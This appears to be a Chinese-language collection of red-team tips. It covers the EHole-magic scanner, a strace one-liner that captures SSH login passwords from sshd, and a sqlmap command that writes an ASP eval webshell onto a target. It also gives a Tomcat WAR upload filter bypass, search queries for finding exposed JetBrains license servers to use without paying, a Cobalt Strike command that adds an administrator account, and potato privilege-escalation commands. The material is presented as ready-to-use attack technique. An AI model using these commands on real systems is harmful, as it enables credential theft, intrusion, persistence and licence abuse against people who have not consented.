一直以来我都觉得EHole这个工具的指纹有点老,也有点少。最近发现这个项目EHole-magic感觉瞬间来精神了,他对EHOLE这款工具增强了一些功能: * 支持Hunter* 指纹库大幅度提升 * 根据命中的指纹打对应的POC * 爆破功能 加黑的两个是我觉得最赞的功能,也是我一直以来想做的。 后续可针对本次护网爆出来的漏洞,整理高可用的POC加入其中,更快更准的打点!
1.如何窃取Linux登录的账号密码(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2> /tmp/sshd.log &) grep -E 'read\(6, ".+\\0\\0\\0\\.+"' /tmp/sshd.log2.不出网的Mssql注入(中文目录写webshell) 上传一个bat文件并执行python sqlmap.py -r aaaaaaaa.txt --batch --file-write ahell.bat -file-dest c:\users\public\music\ashell.batbat的内容为echo ^<%%eval request("aaaaaa")%%^> >D:\\张三的马赛克\\Content\\images\\logo1.asp3.Tomcat后台上传WAR包过滤该如何绕过 将文件后缀修改为xxx.w\\\ar
如果你不想使用任何的破解程序去激活你的JB家的东西,那么白嫖或许会成为你的不二之选。 在线收集版 但是很多都用不了,只能慢慢尝试 使用FOFA"Location: https://account.jetbrains.com/fls-auth?uid"使用Hunterheader="Location: https://account.jetbrains.com/fls-auth?uid"
唯一的问题是,360会有痕迹beacon> help adduserbysamr Use: adduserbysamr [username] [password] [groupName] e.g: adduserbysamr sysadmin p@ssw0rd adduserbysamr sysadmin p@ssw0rd Administrators adduserbysamr sysadmin p@ssw0rd "Remote Desktop Users" Add a user to localgroup by samr, groupName is "Administrators" by default, do not use it at AD.
比SharpSQLTOOLs多了一些土豆,两者相辅相成吧,会很不错多了一个BeiChen的clr_efspotato {cmd} - exec by EfsPotato like clr_exec clr_badpotato {cmd} - exec by BadPotato like clr_exec clr_godpotato {cmd} - exec by GodPotato like clr_exec比SharpSQLToolsGodPotato